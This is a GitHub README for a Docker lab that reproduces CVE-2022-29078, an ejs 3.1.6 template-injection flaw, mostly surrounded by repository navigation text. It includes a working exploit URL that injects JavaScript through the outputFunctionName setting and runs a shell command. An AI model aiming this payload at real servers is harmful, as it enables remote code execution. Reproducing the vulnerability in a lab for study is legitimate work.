CVE-2022-29078

vuln ejs 3.1.6 docker

Setup

git clone https://github.com/miko550/CVE-2022-29078.git  
cd CVE-2022-29078
docker build . -t miko/vuln-ejs
docker run -p 49160:8080 -d --name vuln-ejs miko/vuln-ejs

Usage

http://127.0.0.1:49160/

Exploit

In browser

http://127.0.0.1:49160/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('touch /tmp/pwned');s

Verify exploit

docker exec -it vuln-ejs /bin/bash
ls -la /tmp

Reference

https://eslam.io/posts/ejs-server-side-template-injection-rce/ https://github.com/Olusamimaths/templating-with-ejs

Name		Name	Last commit message	Last commit date
Latest commit History 13 Commits
views		views
.dockerignore		.dockerignore
Dockerfile		Dockerfile
README.md		README.md
app.js		app.js
package-lock.json		package-lock.json
package.json		package.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

views

views

.dockerignore

.dockerignore

Dockerfile

Dockerfile

README.md

README.md

app.js

app.js

package-lock.json

package-lock.json

package.json

package.json

Repository files navigation

CVE-2022-29078

Setup

Usage

Exploit

In browser

Verify exploit

Reference

About

Releases

Packages

Languages

miko550/CVE-2022-29078

Folders and files

Latest commit

History

Repository files navigation

CVE-2022-29078

Setup

Usage

Exploit

In browser

Verify exploit

Reference

About

Resources

Stars

Watchers

Forks

Languages